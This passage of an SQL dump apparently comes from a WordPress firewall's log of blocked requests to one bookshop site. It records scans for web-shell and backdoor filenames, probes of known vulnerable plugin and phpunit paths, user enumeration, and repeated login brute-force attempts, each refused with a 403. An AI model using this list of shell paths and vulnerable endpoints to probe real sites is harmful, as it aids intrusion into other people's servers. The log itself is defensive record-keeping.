Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','3Pf9IopNhylrbwjKTmBDOqU1',0,1637250371.1743,425,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','EzCyFoa6h28NlLcQp50BTOmx',0,1637250372.9895,443,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/css/wp-config.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','jKQP4LDZOTFlna1sfghUmxJG',0,1637250374.2883,739,'','POST',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/ubh/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','ZOdtfsS8WQTJmvAEC92ioMlz',0,1637250376.5325,416,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/wpconfig.bak.php?act=sf','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','dXmDVxauMwg3hsqncQSHryzo',0,1637250378.9030,434,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/wpconfig.bak.php?act=sf','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','qnuMN9xtIYoHF1bkcGXgzpsE',0,1637250381.1460,994,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/haders.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','BkTaDYwe5Jydzm01VqtSK647',0,1637250384.3206,404,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/wp-old-index.php?action=login&pass=-1&submit=','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','yJvzp5IcAtXTOYZiqxrjfVKW',0,1637250386.6627,445,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/legion.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','EAeXbaU5oRcTZuOxg3MNsFrz',0,1637250388.2904,400,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/mu-plugins/db-safe-mode.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','AuDhQp43OI6f78ymzgv1Kjor',0,1637250390.3633,550,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/lfx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','uTaVzchLrwm6KAdZ3G5OEiXS',0,1637250392.9098,406,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/small.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','i1uM0KxbDp7OAEvaYZfmPwBT',0,1637250395.2821,417,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','Rt8CScO5YVlWk7Dwu6xZ3LGy',0,1637250397.6205,455,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/upload.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','p4KEF0h7ePVDWzCicJxoGTfr',0,1637250400.4449,420,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/config.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','rR1wlpSbzjYDn64s7TvXaIQZ',0,1637250404.5532,386,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/test.php?Ghost=send','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','8lLz0nCbyXJgSfNM3Ztw4eq5',0,1637250406.8480,449,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/langar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','0KwUJyiOdpBVlGrxAHFLMoTZ',0,1637250409.5642,429,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','1fSY7Ru68GdKgPXbI2Q4aAM3',0,1637250411.6969,396,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','nlOzPdJGw1xHibo0qSQgUCF5',0,1637250414.1819,407,'','GET',403,0,700,0,1,'',0),('139.59.75.162',2335919010,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/52.0.2743.116 Safari\\/537.36\"}','pzvYh8fkwu0XTIbUeExDZAoL',0,1637251563.7537,448,'','POST',403,0,600,0,1,'',0),('139.59.118.238',2335930094,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','tTo8jdx1DIV2aArv6BOuyZRe',0,1637253494.6264,442,'','POST',403,0,600,0,1,'',0),('163.178.170.141',2746395277,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','Ny6sZQSXdftVAivTCe3GrUlu',0,1637257599.4486,532,'','POST',403,0,600,0,1,'',0),('81.25.127.54',1360625462,'','https://ashbooks.co.uk/wp-content/plugins/wp-db-ajax-made/wp-ajax.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/50.0.2661.75 Safari\\/537.36\",\"2\":\"ashbooks.co.uk\"}','zClYHwvjQ0EIGO9ZKXo1MDuh',0,1637258589.4712,464,'','GET',403,0,700,0,1,'',0),('103.114.144.212',1735561428,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','sqgoCTXw4UZvl2uphtW0z3PG',0,1637259598.6244,750,'','POST',403,0,600,0,1,'',0),('34.105.209.130',577360258,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.97 Safari\\/537.36\"}','ola9gmOBVt0JSf1eC2NkZWuF',0,1637261720.0191,916,'','POST',403,0,600,0,1,'',0),('131.72.221.190',2202590654,'','https://ashbooks.co.uk/wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\",\"2\":\"http:\\/\\/ashbooks.co.uk\\/\\/\\/wp-json\\/wp\\/v2\\/users\\/\"}','I6GYKQsA2WxqvRumw8g1Crez',0,1637262188.5170,614,'','GET',403,0,520,0,1,'',0),('185.191.34.215',3116311255,'','https://ashbooks.co.uk/wp-includes/SimplePie/gzdecodes.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:40.012; !en.support.wordpress.com; !support.wordpress.com; support.wordpress.com; en.support.wordpress.com) Gecko\\/20120121 Firefox\\/40.0\"}','GfTkcMzSNb2lQ6IFK5hd0Avi',0,1637263834.1683,423,'','GET',403,0,700,0,1,'',0),('208.113.186.18',3497114130,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','MezKSLNrcbAlQH9W6G5y0hsT',0,1637265104.5634,197,'','POST',403,0,600,0,1,'',0),('173.249.36.84',2918786132,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','aoPjUETJgwIxAOSm9f1R7MWD',0,1637266717.6849,485,'','POST',403,0,600,0,1,'',0),('81.88.52.114',1364735090,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.101 Safari\\/537.36\"}','63NalmEAn18WYw5IUoDBJVXb',0,1637268454.1491,516,'','POST',403,0,600,0,1,'',0),('185.206.92.65',3117308993,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.106 Safari\\/537.36\"}','ANa7DqW0oKlj5chmR9dBMwz8',0,1637270045.6304,492,'','POST',403,0,600,0,1,'',0),('185.2.4.71',3103917127,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.87 Safari\\/537.36\"}','l2PxtNAqdZLHoVQX58DjUWmM',0,1637271670.0654,613,'','POST',403,0,600,0,1,'',0),('194.163.152.242',3265501426,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','D6esolNkWarySC58u2RvUpjK',0,1637273209.1433,450,'','POST',403,0,600,0,1,'',0),('162.212.174.78',2731847246,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183 Safari\\/537.36\"}','YK20dmCylSJxhDZLBFvGiHIf',0,1637274152.0175,433,'','POST',403,0,600,0,1,'',0),('182.176.122.104',3065018984,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/51.0.2704.106 Safari\\/537.36\"}','0SlesJrWRUmFYh4Htqp5GBIw',0,1637274836.0660,497,'','POST',403,0,600,0,1,'',0),('161.97.68.199',2707506375,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/55.0.2883.87 Safari\\/537.36\"}','vXJxekCSrljFBN7nyoRWTLcd',0,1637276623.9482,529,'','POST',403,0,600,0,1,'',0),('208.113.160.8',3497107464,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','LQgATil93NWHy0mRoUZYkajC',0,1637280459.4954,469,'','POST',403,0,600,0,1,'',0),('208.113.160.8',3497107464,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','PcmYeB53wDvqarbsKHugRZ4F',0,1637282290.1067,506,'','POST',403,0,600,0,1,'',0),('144.91.68.146',2421900434,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','2S6xIitTVGMlLZ3wbucN1peX',0,1637283941.5327,925,'','POST',403,0,600,0,1,'',0),('197.3.8.18',3305310226,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"python-requests\\/2.26.0\"}','iWze6bXurRIPJjO0sGF2vDYo',0,1637284602.4349,435,'','POST',403,0,600,0,1,'',0),('197.3.8.18',3305310226,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"python-requests\\/2.26.0\"}','RqhWU18T5noscf2jFCNrJw7H',0,1637284611.7541,469,'','POST',403,0,600,0,1,'',0),('197.3.8.18',3305310226,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"python-requests\\/2.26.0\"}','bKJDmuA0ajMEzi1SNfO6HpVI',0,1637284620.5430,446,'','POST',403,0,600,0,1,'',0),('197.3.8.18',3305310226,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"python-requests\\/2.26.0\"}','185Tjlo7beFsIqcwR6aGYWAN',0,1637284629.4518,462,'','POST',403,0,600,0,1,'',0),('197.3.8.18',3305310226,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"python-requests\\/2.26.0\"}','E843KDQ6NxTubhdGjnLPXfv1',0,1637284637.9557,443,'','POST',403,0,600,0,1,'',0),('197.3.8.18',3305310226,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"python-requests\\/2.26.0\"}','qtQdkJoDSAselN5i6UVBruEW',0,1637284639.5838,401,'','GET',404,0,700,0,1,'',0),('173.212.235.115',2916412275,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','W5hdeXKp7j86YZqm2MzE4kVG',0,1637285651.1312,501,'','POST',403,0,600,0,1,'',0),('103.114.144.212',1735561428,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.80 Safari\\/537.36\"}','gQhn4XjqUl8wyME1e3ivxJFT',0,1637287463.6558,514,'','POST',403,0,600,0,1,'',0),('104.37.84.5',1747276805,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','4DvcsxA1UWzLjk0nES6ON8Ql',0,1637290899.8139,211874,'','POST',403,0,600,0,1,'',0),('5.182.210.155',95867547,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko\\/20100101 Firefox\\/55.0\"}','0gPMNZAhmVi6wGYcavC5nkR8',0,1637291926.0929,442,'','POST',403,0,600,0,1,'',0),('20.37.127.214',338001878,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/66.0.3359.117 Safari\\/537.36\"}','VyPhE85nxZXdY0B3OQDScMaK',0,1637292547.2154,495,'','POST',403,0,600,0,1,'',0),('52.44.101.206',875324878,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/53.0.2785.143 Safari\\/537.36\"}','PmcDeSZpUC4XM9kQNEjowGsx',0,1637294257.8974,704,'','POST',403,0,600,0,1,'',0),('95.217.144.72',1608093768,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/66.0.3359.117 Safari\\/537.36\"}','mOCesaVExGoFr7iu1c4LZkf5',0,1637296023.9736,622,'','POST',403,0,600,0,1,'',0),('81.88.52.175',1364735151,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/54.0.2840.99 Safari\\/537.36\"}','TWYjcCwhiqr7AvoU2HtFy68M',0,1637297671.4091,638,'','POST',403,0,600,0,1,'',0),('198.23.238.74',3323457098,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282 Safari\\/537.36\"}','RzkXIyDZAOCxwnhmKdip0Fj8',0,1637299171.9863,443,'','POST',403,0,600,0,1,'',0),('159.89.201.91',2673461595,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','4Dw9Go2ItPVcjpRdh8YBA5vO',0,1637299340.2311,458,'','POST',403,0,600,0,1,'',0),('147.124.220.233',2474433769,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0 Safari\\/537.36\"}','qjn6DdPyW8seQozNpmOIcZRK',0,1637299946.7280,412,'','GET',403,0,520,0,1,'',0),('186.67.132.252',3124987132,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/48.0.2564.116 Safari\\/537.36\"}','5IEvbGLyuCY8hMfS3tdP0Uae',0,1637302799.4135,426,'','POST',403,0,600,0,1,'',0),('167.172.153.166',2813106598,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','OeHYx9qGa45RcVFytP2KC6QM',0,1637304555.1774,1307,'','POST',403,0,600,0,1,'',0),('109.74.197.132',1833616772,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/48.0.2564.116 Safari\\/537.36\"}','W2adSEmIiqsfU4oOHy8tTJ9X',0,1637308088.5529,477,'','POST',403,0,600,0,1,'',0),('20.185.231.167',347727783,'','https://www.ashbooks.co.uk/wp-includes/css/modules.php','','{\"1\":\"python-requests\\/2.26.0\"}','c9WNwKGEs2AQjpOrUMd8P0uJ',0,1637308978.9426,428,'','GET',403,0,700,0,1,'',0),('20.185.231.167',347727783,'','https://www.ashbooks.co.uk/wso.php','','{\"1\":\"python-requests\\/2.26.0\"}','fwWiyUSnamphXBjqI1PFAstO',0,1637308986.2748,515,'','GET',403,0,700,0,1,'',0),('20.185.231.167',347727783,'','https://www.ashbooks.co.uk/wp-content/plugins/upspy/index.php','','{\"1\":\"python-requests\\/2.26.0\"}','cikLJGn5KazShRtF8dDPe2Xx',0,1637308999.0570,847,'','GET',403,0,700,0,1,'',0),('20.185.231.167',347727783,'','https://www.ashbooks.co.uk/wp-content/plugins/ubh/index.php','','{\"1\":\"python-requests\\/2.26.0\"}','OJi2Wz3BjqxAvmgkTX0tbRoc',0,1637309002.4646,439,'','GET',403,0,700,0,1,'',0),('20.185.231.167',347727783,'','https://www.ashbooks.co.uk/wp-content/plugins/vwcleanerplugin/bump.php?cache','','{\"1\":\"python-requests\\/2.26.0\"}','ba2mh61jzgD4EdYyWlCof95G',0,1637309006.0777,437,'','GET',403,0,700,0,1,'',0),('20.185.231.167',347727783,'','https://www.ashbooks.co.uk/wp-content/plugins/xichang/x.php?xi','','{\"1\":\"python-requests\\/2.26.0\"}','Rkb8qEFoJm4N1LQPT3WcilO2',0,1637309008.6650,437,'','GET',403,0,700,0,1,'',0),('20.185.231.167',347727783,'','https://www.ashbooks.co.uk/wp-admin/shapes.php','','{\"1\":\"python-requests\\/2.26.0\"}','avKzJu9RUjXQeY04Vlickmq7',0,1637309015.6719,467,'','GET',403,0,700,0,1,'',0),('20.185.231.167',347727783,'','https://www.ashbooks.co.uk/olux.php','','{\"1\":\"python-requests\\/2.26.0\"}','oHR6vWtdxIM9LhGf0wEspiYO',0,1637309018.3858,428,'','GET',403,0,700,0,1,'',0),('20.185.231.167',347727783,'','https://www.ashbooks.co.uk/indoxploit.php','','{\"1\":\"python-requests\\/2.26.0\"}','lV9P8cMrBTg7a0WxhtIFCDms',0,1637309025.0663,461,'','GET',403,0,700,0,1,'',0),('20.185.231.167',347727783,'','https://www.ashbooks.co.uk/up.php','','{\"1\":\"python-requests\\/2.26.0\"}','JWvGbhnYord6CLODRmTPiA8l',0,1637309036.0775,490,'','GET',403,0,700,0,1,'',0),('20.185.231.167',347727783,'','https://www.ashbooks.co.uk/upload.php','','{\"1\":\"python-requests\\/2.26.0\"}','hFP1dCXQYDa9pBibv2MOHgtw',0,1637309038.4605,485,'','GET',403,0,700,0,1,'',0),('20.185.231.167',347727783,'','https://www.ashbooks.co.uk/shell.php','','{\"1\":\"python-requests\\/2.26.0\"}','kj7N4lctW0fweQ1HTGAp8KmI',0,1637309042.7159,813,'','GET',403,0,700,0,1,'',0),('20.185.231.167',347727783,'','https://www.ashbooks.co.uk/wp-admin/network/wp-footer.php','','{\"1\":\"python-requests\\/2.26.0\"}','yOkxe9t8F6XJSgGjI40fcw3r',0,1637309046.4243,553,'','GET',403,0,700,0,1,'',0),('20.185.231.167',347727783,'','https://www.ashbooks.co.uk/wp-info.php','','{\"1\":\"python-requests\\/2.26.0\"}','5Ss9UDHo7aNiz0ZFwh1fR6Gl',0,1637309049.2333,479,'','GET',403,0,700,0,1,'',0),('20.185.231.167',347727783,'','https://www.ashbooks.co.uk/wp-content/vuln.php','','{\"1\":\"python-requests\\/2.26.0\"}','k9hpAvNg6uwDBFOJWfeMy8ZY',0,1637309051.9430,816,'','GET',403,0,700,0,1,'',0),('20.185.231.167',347727783,'','https://www.ashbooks.co.uk/upel.php','','{\"1\":\"python-requests\\/2.26.0\"}','PHXSCycaAL6dq9wnEOibQ4IR',0,1637309054.6317,675,'','GET',403,0,700,0,1,'',0),('20.185.231.167',347727783,'','https://www.ashbooks.co.uk/wp-content/plugins/ppus/up.php','','{\"1\":\"python-requests\\/2.26.0\"}','6A7NCzKRum2ZY9w1gkdBlvj3',0,1637309056.5152,447,'','GET',403,0,700,0,1,'',0),('20.185.231.167',347727783,'','https://www.ashbooks.co.uk/098.php','','{\"1\":\"python-requests\\/2.26.0\"}','datLb5KxGclZpe1jPYOFv0ou',0,1637309058.4965,445,'','GET',403,0,700,0,1,'',0),('20.185.231.167',347727783,'','https://www.ashbooks.co.uk/V5.php','','{\"1\":\"python-requests\\/2.26.0\"}','xvm3Rnw5DXcTzoHdA9FglrL2',0,1637309062.4284,825,'','GET',403,0,700,0,1,'',0),('20.185.231.167',347727783,'','https://www.ashbooks.co.uk/new_license.php','','{\"1\":\"python-requests\\/2.26.0\"}','X637fjWsZACmBrnKSVG5qMoT',0,1637309076.4831,445,'','GET',403,0,700,0,1,'',0),('20.185.231.167',347727783,'','https://www.ashbooks.co.uk/wp-content/plugins/theme-configurator/mini.php','','{\"1\":\"python-requests\\/2.26.0\"}','wjBh4TCogHAFDKJv0slNWey8',0,1637309080.8594,456,'','GET',403,0,700,0,1,'',0),('20.185.231.167',347727783,'','https://www.ashbooks.co.uk/wp-content/plugins/widget-logic/mini.php','','{\"1\":\"python-requests\\/2.26.0\"}','3opDwa8eIkb9d5PQXE0Tl6Fu',0,1637309082.4118,431,'','GET',403,0,700,0,1,'',0),('159.203.115.159',2680910751,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.97 Safari\\/537.36\"}','nRIexp2GVWMcoLqPd8AyDasw',0,1637311581.5790,458,'','POST',403,0,600,0,1,'',0),('65.21.234.114',1091955314,'','https://ashbooks.co.uk/wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\",\"2\":\"http:\\/\\/ashbooks.co.uk\\/\\/\\/wp-json\\/wp\\/v2\\/users\\/\"}','twTRk8XYJfNxBFoq6aWc0uh1',0,1637312324.3309,480,'','GET',403,0,520,0,1,'',0),('5.9.55.176',84490160,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','rB8EjgkW0xFXPuoc9GRpJQK7',0,1637313300.7073,654,'','POST',403,0,600,0,1,'',0),('102.157.84.33',1721586721,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"python-requests\\/2.26.0\"}','XO24NgzSbFHmjK1L9EaUQ5fu',0,1637313570.3903,529,'','POST',403,0,600,0,1,'',0),('102.157.84.33',1721586721,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"python-requests\\/2.26.0\"}','1y7dNj94SYRwOVTpibLrUIlC',0,1637313596.1551,531,'','POST',403,0,600,0,1,'',0),('102.157.84.33',1721586721,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"python-requests\\/2.26.0\"}','ilxZOAp0PoQg4qskYtTNUJEX',0,1637313622.6239,558,'','POST',403,0,600,0,1,'',0),('102.157.84.33',1721586721,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"python-requests\\/2.26.0\"}','Qoh53bfkCKzOdjRslm69SJqu',0,1637313652.7220,589,'','POST',403,0,600,0,1,'',0),('102.157.84.33',1721586721,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"python-requests\\/2.26.0\"}','qI5TVdhEKZ4bCJ6o2trRW7gz',0,1637313683.1020,613,'','POST',403,0,600,0,1,'',0),('102.157.84.33',1721586721,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"python-requests\\/2.26.0\"}','3cO6BdFoJMSti1hHDLr9CbQm',0,1637313686.2664,523,'','GET',404,0,700,0,1,'',0),('45.40.166.143',757638799,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.94 